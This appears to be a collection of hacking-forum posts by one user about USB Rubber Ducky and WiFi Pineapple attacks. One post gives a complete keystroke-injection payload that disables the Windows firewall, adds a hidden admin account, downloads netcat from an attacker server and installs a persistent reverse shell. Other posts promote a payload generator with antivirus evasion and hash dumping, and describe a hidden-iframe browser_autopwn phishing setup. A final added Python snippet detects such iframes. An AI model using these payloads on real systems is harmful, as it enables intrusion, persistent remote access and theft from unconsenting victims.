
skysploit

Posts posted by skysploit

  1. I have been unsuccessful at getting Windows 7 and OS X payloads to work with VirtualBox. But Windows XP, Vista, Server 2003, and all the Linux distros I have tried work just fine. VMPlayer works great for Windows 7. I would be interested to see if anyone out there has been successful at getting VirtualBox working with Windows 7...

  2. Hello,

    Here's a new payload that I came up with. It targets Windows 7 w/UAC enabled. Here's what happens when you run it...

    1. Opens an admin command prompt
    2. Creates an admin user (default creds: hacker | mysecretpassword)
    3. Disables the Windows Firewall
    4. Enables remote desktop
    5. Enables remote assistance
    6. Hides the newly created admin account from the Windows Welcome Screen
    7. Creates a VBScript to run a hidden instance of Netcat
    8. Creates a batch file to launch Netcat (this is needed to mask an open netcat session from the desktop)
    9. Downloads netcat from the attacker's web server (to copy netcat into the web directory on Kali: cp /usr/share/windows-binaries/nc.exe /var/www/nc.exe; to start Apache: service apache2 start)
    10. Calls the VBScript to launch the hidden netcat shell
    11. Creates a batch file in the startup directory that will launch the VBScript every time a user logs in (the batch file is hidden/transparent to the user while it runs)

    So here it is... I will add a fully configurable version of ~Persistence~ to the Simple-Ducky Payload Generator this weekend.

    ~skysploit

    REM ~Persistence~ : Windows 7 with UAC enabled, netcat listener on 172.16.1.5:4444
    REM Give the HID driver time to install before typing anything
    DELAY 5000
    ESCAPE
    DELAY 300
    REM Open the Start menu, search for cmd, open its context menu (MENU)
    REM and pick "Run as administrator" with its accelerator key "a"
    CONTROL ESCAPE
    DELAY 300
    STRING cmd
    DELAY 400
    MENU
    DELAY 400
    STRING a
    DELAY 600
    REM UAC prompt: LEFTARROW moves the focus to "Yes", ENTER confirms
    LEFTARROW
    DELAY 300
    ENTER
    DELAY 800
    REM The elevated prompt starts in C:\Windows\System32, so nc.vbs, nc.bat
    REM and nc.exe below are all created there
    STRING netsh firewall set opmode disable
    ENTER
    DELAY 300
    STRING net user hacker mysecretpassword /add && net localgroup administrators hacker /add
    ENTER
    DELAY 200
    REM The password is longer than 14 characters, so net user asks for confirmation
    STRING y
    ENTER
    DELAY 400
    REM Enable Remote Desktop and Remote Assistance through the registry
    STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    ENTER
    DELAY 300
    STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
    ENTER
    DELAY 300
    REM Hide the new account from the Welcome screen
    STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker /t REG_DWORD /d 0 /f
    ENTER
    DELAY 300
    REM Write nc.vbs with "copy con"; CTRL z followed by ENTER ends the input
    STRING copy con nc.vbs
    ENTER
    STRING Set WshShell = CreateObject("WScript.Shell")
    ENTER
    STRING WshShell.Run chr(34) & "c:\Windows\System32\nc.bat" & Chr(34), 0, false
    ENTER
    STRING Set WshShell = Nothing
    ENTER
    CTRL z
    ENTER
    REM cmdow.exe is a separate tool that this payload does not download; the
    REM console window is already hidden by the 0 window style in WshShell.Run
    STRING echo cmdow @ /hid >> nc.bat
    ENTER
    STRING echo nc -nv 172.16.1.5 4444 -e cmd.exe >> nc.bat
    ENTER
    REM Fetch nc.exe from the attacker's web server: the URL and the destination
    REM path are two separately quoted arguments to DownloadFile
    STRING powershell (new-object System.Net.WebClient).DownloadFile('http://172.16.1.5/nc.exe','c:\Windows\System32\nc.exe');
    ENTER
    STRING cscript nc.vbs
    ENTER
    REM All Users startup folder; on Windows 7 this path resolves through the
    REM compatibility junctions to %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup
    STRING cd c:\Documents And Settings\All Users\Start Menu\Programs\Startup\
    ENTER
    STRING echo cmdow @ /hid >> persistence.bat
    ENTER
    STRING echo cscript c:\Windows\System32\nc.vbs >> persistence.bat
    ENTER
    STRING exit
    ENTER
    
  3. Hello,
    With usbrubberducky.com being down, I decided to create the Simple-Ducky Payload Generator. The simple-ducky is designed to quickly create reliable payloads and launch listeners. The Simple-Ducky currently uses version 2.6 of the duck encoder. The latest version of the Simple-Ducky supports all Debian Linux distros (i.e. Kali-Linux, Ubuntu, Linux Mint, etc.). The smart installer will take care of all the work for you.
    With the simple-ducky, in a matter of seconds you can:
    * Create your evil executable (its automatically placed in your web directory)
    * Create your inject.bin
    * Launch a listener (meterpreter or netcat)
    * Generate custom password lists
    * Crack extracted passwords
    * And so much more...

    Note: This framework was designed to work with Kali Linux out of the box (a JDK update is required and included with the simple-ducky). However, it should work with other Linux distros as long as you install the required dependencies (see the wiki page for non-Kali installs).

    Installation

    Installing the simple-ducky just got even easier. Just download the install script, then copy and paste the lines below into your terminal. The install script now supports all Debian-based Linux distros.

    Install videos are available on the Google code page: https://code.google.com/p/simple-ducky-payload-generator/

    There are now two options to install the simple ducky....

    Download the install file: https://code.google.com/p/simple-ducky-payload-generator/downloads/detail?name=installer_v1.1.1_debian.sh&can=2&q=
    root@kali:~# chmod +x installer_v1.1.1_debian.sh
    root@kali:~# ./installer_v1.1.1_debian.sh
    root@kali:~# rm installer_v1.1.1_debian.sh
    
    To run the program; root@kali:~# simple-ducky

    Change Log

    v1.1.1 Changes
    1. Added tons of new features: shells with dbd (incredibly powerful, see video below) and the Custom Payload Builder

    2. Cleaned up menu options, dependencies, and processes

    3. Made bug fixes to several payloads

    4. Replaced Netcat with Ncat

    v1.1.0 Changes
    1. Upgraded the encoder to version 2.6

    2. Made changes to the main menu

    3. Added a new payload: LM/NTLM Hash Dump from a Live System

    4. Added a new function: LM/NTLM Password Hasher

    5. Added a new tool: Site2lst Custom Wordlist Builder

    6. Upgraded the installer: now there is just one version of the Simple-Ducky that supports all Debian distros (tested on Kali-Linux, Ubuntu and Linux Mint)

    v1.0.9 Changes
    1. Added a new payload subset titled "Forced Phishing & Web Attacks"

    2. Integrated SE-Toolkit, Metasploit's Browser_Autopwn, and BurpSuite.

    3. Added Payload: Local DNS Poisoning | SE-Toolkit Java Applet Attack

    4. Added Payload: Local DNS Poisoning | Metasploit's Browser_Autopwn

    5. Added Payload: Proxy in the Middle (PiTM) | No Admin Access Needed | Burpsuite

    v1.0.8 Changes
    1. Added OSX Single User Mode Reverse Shell Payload

    2. Made minor scripting changes

    3. Changed Encoder to version 2.5

    4. Fixed bugs in the FTP Server Setup option

    5. Created a User add function for the FTP Server Setup Option

    v1.0.7 Changes

    1. Fixed command line entrance method on all Windows Vista/7 Payloads w/o UAC (Props to arzen)

    v1.0.6 Changes

    1. Created two separate versions of the simple-ducky (One for Kali-Linux and the other for Other Linux Distros)
    * The purpose of the Kali-Edition is to follow the Debian compliance that Offensive-Security established, in hopes of getting the Simple-Ducky prepackaged in Kali-Linux. (Fingers crossed)
    2. Removed the install dependencies option on the Kali-Linux version (Kali will keep these up to date)(Other-Linux version still has it)

    3. Updated the PowerShell Download & Execute payloads to provide better obfuscation (tested on fully patched Windows Vista/7/8 running McAfee)

    4. Added a new function that configures the Pure-FTPD server for the user

    v1.0.5 Changes
    1. Complete Payload and Menu Revamp
    v1.0.4 Changes
    1. Added ~Persistence~ Payload
    2. Updated Menu Options
    v1.0.3 Changes
    1. Payload Update
    2. Added 64bit JDK Update Support
    3. Added initial delay function (allows you to set a custom delay for driver install time).
    4. Changed encoder version from 2.4 to 3.0
    v1.0.2 Changes
    1. International keyboard mapping added. -- Testers would be greatly appreciated.
    2. Aesthetic changes to text.
    v1.0.1 Changes
    1. Payload Update
    2. Encoder downgraded from v3.0 to v2.4 due to issues encoding the Win 7 Reverse Shell payload.

    Custom Payload Builder and DBD... Watch as we get NT\SYSTEM level privs while evading AV!

    Thanks for checking out the Simple-Ducky. Please provide any feedback and bug fixes to skyploit@gmail.com

    ~skysploit


  4. Yes, sorry, I figured it out - I've been stupid. I thought at some point you were talking about a standalone Metasploit implementation.

    If I have my laptop I don't need a Pineapple - a wifi adapter works just as well.

    Well, who's to say that you can't set up a remote listener and have the iframe pointed to that location. Or possibly have the laptop within wireless range of the Pineapple.

  5. Guys,

    Here's a quick script for changing your MAC address. Simply run the script and enter the network card you would like to change. You will see your new MAC address as well as your original MAC. Enjoy!

    ~skysploit

    #!/bin/sh
    
    # This script will change your MAC address
    # Usage: ./mac-me.sh   (run as root; requires the macchanger package)
    # Script by skysploit
    clear
    echo "What interface would you like to change? Example: eth0"
    echo ""
    read ADAPTER
    clear
    # macchanger needs root to touch the interface and must be installed
    if [ "$(id -u)" -ne 0 ]; then
        echo "This script must be run as root"
        exit 1
    fi
    if ! command -v macchanger >/dev/null 2>&1; then
        echo "macchanger not found: apt-get install macchanger"
        exit 1
    fi
    echo "Entering stealth mode "
    echo ""
    # the interface has to be down before its hardware address can be changed;
    # macchanger -r prints the original and the new (random) MAC
    ifconfig "$ADAPTER" down
    macchanger -r "$ADAPTER"
    ifconfig "$ADAPTER" up
    echo ""
    echo "Your MAC address has been changed, it will reset upon reboot"
    echo "If this script failed: <apt-get install macchanger> and run as root"
    
  6. Though the green CSS theme is pretty slick, it doesn't match my desktop. And everyone knows how picky hackers can be.... Anyhow, here's my CSS script. Now that I have shown you mine, please show me yours.

    ~skysploit

    .navbar {
        top: 10px;
        min-width: 80%;
        background: gray;
        padding-left: 5px;
        padding-right: 5px;
        padding-top: 3px;
        padding-bottom: 3px;
        border-top-left-radius: 10px 10px;
        border-top-right-radius: 10px 10px;
        border-bottom-left-radius: 10px 10px;
        border-bottom-right-radius: 10px 10px;
        text-align: center;
        color: black;
    }

    .content {
        font-family: monospace;
        min-width: 700px;
        max-width: 700px;
        text-align: center;
        margin: 0 auto;
    }

    .contentTitle {
        text-align: left;
        padding-left: 10px;
        padding-top: 2px;
        padding-bottom: 2px;
        border-top-left-radius: 10px 10px;
        border-top-right-radius: 10px 10px;
        background: gray;
        font-weight: bold;
        font-size: 15px; /* a unitless 15 is invalid CSS and is ignored by browsers */
        color: black;
    }

    .contentContent {
        text-align: left;
        padding-left: 10px;
        padding-right: 10px;
        padding-top: 5px;
        padding-bottom: 5px;
        border-bottom-left-radius: 10px 10px;
        border-bottom-right-radius: 10px 10px;
        background: black;
        min-height: 40px;
        color: white;
        border-color: gray;
        border-style: solid;
        border-width: 1px;
    }

    .sidePanelLeft {
        position: absolute;
        top: 50px;
        text-align: left;
        min-width: 300px;
        font-family: monospace;
    }

    .sidePanelRight {
        position: absolute;
        right: 1%;
        top: 50px;
        text-align: left;
        min-width: 300px;
        font-family: monospace;
    }

    .sidePanelTitle {
        padding-left: 10px;
        padding-top: 2px;
        padding-bottom: 2px;
        border-top-left-radius: 10px 10px;
        border-top-right-radius: 10px 10px;
        background: gray;
        font-weight: bold;
        font-size: 15px;
        color: white;
    }

    .sidePanelContent {
        padding-left: 10px;
        padding-right: 10px;
        padding-top: 5px;
        padding-bottom: 5px;
        background: black;
        border-bottom-left-radius: 10px 10px;
        border-bottom-right-radius: 10px 10px;
        min-height: 40px;
        color: white;
        border-color: gray;
        border-style: solid;
        border-width: 1px;
    }

    .moduleTitle {
        padding-left: 10px;
        padding-top: 2px;
        padding-bottom: 2px;
        border-top-left-radius: 10px 10px;
        border-top-right-radius: 10px 10px;
        background: gray;
        font-weight: bold;
        font-size: 15px;
        color: white;
    }

    .moduleContent {
        padding-left: 10px;
        padding-right: 10px;
        padding-top: 5px;
        padding-bottom: 5px;
        border-bottom-left-radius: 10px 10px;
        border-bottom-right-radius: 10px 10px;
        background: black;
        min-height: 40px;
        color: white;
        border-color: gray;
        border-style: solid;
        border-width: 1px;
    }

    .modules {
        position: absolute;
        right: 20%;
        left: 20%;
        font-family: monospace;
    }

    .moduleContent td {
        border-width: 15px;
        border-spacing: 20px;
        border-style: solid;
        border-color: black;
        border-collapse: collapse;
        color: white;
    }

    body {
        font-family: monospace;
        color: white;
        background: black;
        text-align: center;
    }

    a {
        color: white;
    }

    input[type=text], input[type=password] {
        font-family: courier;
        border: 1px;
        background-color: black;
        color: white;
        border-style: dotted;
    }

    pre {
        white-space: pre-wrap;       /* CSS 3 */
        white-space: -moz-pre-wrap;  /* Mozilla, since 1999 */
        white-space: -pre-wrap;      /* Opera 4-6 */
        white-space: -o-pre-wrap;    /* Opera 7 */
        word-wrap: break-word;       /* Internet Explorer 5.5+ */
    }
    
    


  7. Wait... Pineapple's firmware includes metasploit framework? Get outta town!

    crepsidro, I have not personally tried to run msf on the Pineapple. I don't think it has the "juice" to support it. Here's a little more info on preparing for the autopwn attack. There are multiple ways to do this; below is the way I typically set up my connections.

    1. Connect the Pineapple to your ethernet port and connect your wireless card to a wireless network.
    2. Using Backtrack running in a VM, connect both the wireless card and the ethernet port to the VM (yes, I pull both resources from the hosting machine to the VM).
    3. Run the pineapple setup script and set your ethernet port to the default address (172.16.42.42), set the wifi adapter to the network's gateway address.
    4. Open Metasploit using "msfconsole" or "msfcli" (Again use Google as a reference to help set the parameters above)

    Hope this helps.

    ~skysploit

  8. So, here's a simple change that could pay out big (in a pinch) on a pentest...

    How does it work?

    It embeds a tiny iframe (about the size of a ".") at the bottom of a spoofed webpage. Once someone browses to the site they're immediately connected to the attacking machine. Dozens of exploits are then sent back to the victim. If the attack is successful, the attacking machine will receive a meterpreter shell.

    How to set it up.

    1. Add the iframe below to any/all of your spoofed sites. Example, the "facebook.html" file from Darren's "phish-pineapple.zip".
    2. Open msfconsole and "use auxiliary/server/browser_autopwn"
    3. Set the options below (n00bs, let Google be your guide)
    4. Turn on "DNS Spoof" from the main page of the Pineapple.
    5. Wait for the victim (subject/client) to browse to the site. Once a connection to the spoofed page has been initiated you will fire a tasty batch of exploits.

    Quick note with browser_autopwn (for those that have not used it): It is a very finicky auxiliary module within the msf. It will more than likely fail on a patched system (hence the purpose of pentesting). Not to mention the amount of traffic that is generated by browser_autopwn. It's always best to enumerate, find out what browsers are being used, then perform a targeted attack.

    Side note: Pentesting at Starbucks can get you put in jail...

    Happy (responsible) hacking!
    ~skysploit

    iframe (add this at the end of the spoofed page, just before the closing body tag)

    <iframe src="http://172.16.42.42:8080/hacked" height="0" width="0"></iframe>
    

    Settings for browser_autopwn

    msf  auxiliary(browser_autopwn) > show options
    
    Module options (auxiliary/server/browser_autopwn):
    
       Name           Current Setting   Required       Description
       ----           ---------------   --------       -----------
       LHOST            172.16.42.42      yes          The IP address to use for reverse-connect payloads
       SRVHOST          172.16.42.42      yes          The local host to listen on. 
       SRVPORT          8080              yes          The local port to listen on.
       SSL              false             no           Negotiate SSL for incoming connections
       SSLCert                            no           Path to a custom SSL certificate 
       SSLVersion       SSL3              no           Specify the version of SSL that should be used
       URIPATH          /hacked           no           The URI to use for this exploit (default is random)
    
    msf  auxiliary(browser_autopwn) > exploit
    
    .......
    (Server build process was pulled out)
    .......
    
    [*] --- Done, found 53 exploit modules
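
The injected iframe is also what a defender, or a user who views the page source, would look for in a captured page, so here is an added example (my own code, not from the post) that scans HTML for that pattern: an iframe that is sized to be invisible, or hidden with CSS, whose src points at a host other than the page's own. The sample pages are constructed, with INJECTED carrying the iframe from the post; the spoofed-site hostname www.facebook.com is an assumption taken from the facebook.html example above.

```python
"""Find hidden, off-host iframes in captured HTML.

Added example, not code from the post. Flags <iframe> elements that are invisible
(zero-size attributes or hiding CSS) and point away from the page's own host, the
shape of the browser_autopwn hook described above. Sample pages are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":                      # HTMLParser lower-cases tag names
            self.iframes.append({name.lower(): (value or "") for name, value in attrs})


def _is_tiny(value: str) -> bool:
    """True for height/width values of 1px or less ("0", "0px", " 1 ")."""
    number = value.strip().lower().rstrip("px").strip()
    try:
        return float(number) <= 1
    except ValueError:                           # percentages, "auto", empty
        return False


def _css_hidden(style: str) -> bool:
    compact = style.replace(" ", "").lower()
    return any(rule in compact for rule in
               ("display:none", "visibility:hidden", "height:0", "width:0"))


def find_hidden_iframes(html: str, page_host: str) -> list:
    """Return [{"src", "host", "reason"}] for iframes that are hidden and off-host."""
    collector = IframeCollector()
    collector.feed(html)
    hits = []
    for frame in collector.iframes:
        src = frame.get("src", "")
        host = urlparse(src).hostname or page_host    # relative src stays on the page
        if host == page_host:
            continue                                   # same host: not the phishing pattern
        tiny = _is_tiny(frame.get("height", "")) or _is_tiny(frame.get("width", ""))
        if tiny:
            hits.append({"src": src, "host": host, "reason": "zero-size"})
        elif _css_hidden(frame.get("style", "")):
            hits.append({"src": src, "host": host, "reason": "css-hidden"})
    return hits


# Constructed sample pages (not captured traffic). INJECTED carries the post's iframe.
CLEAN = """<html><body><h1>Welcome</h1>
<iframe src="https://www.facebook.com/plugins/like.php" width="450" height="80"></iframe>
</body></html>"""
INJECTED = CLEAN.replace(
    "</body>",
    '<iframe SRC="http://172.16.42.42:8080/hacked" height = "0" width ="0"></iframe></body>')
CSS_HIDDEN = CLEAN.replace(
    "</body>",
    '<iframe src="http://phish.example/x" style="display: none"></iframe></body>')

if __name__ == "__main__":
    for name, page in (("clean", CLEAN), ("injected", INJECTED), ("css-hidden", CSS_HIDDEN)):
        print(name, find_hidden_iframes(page, "www.facebook.com"))
```

The same-host check is what keeps legitimate tracking or widget frames from tripping the scan; a pinned pineapple address like 172.16.42.42 will never match the spoofed site's hostname, which is exactly why the hook stands out.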
    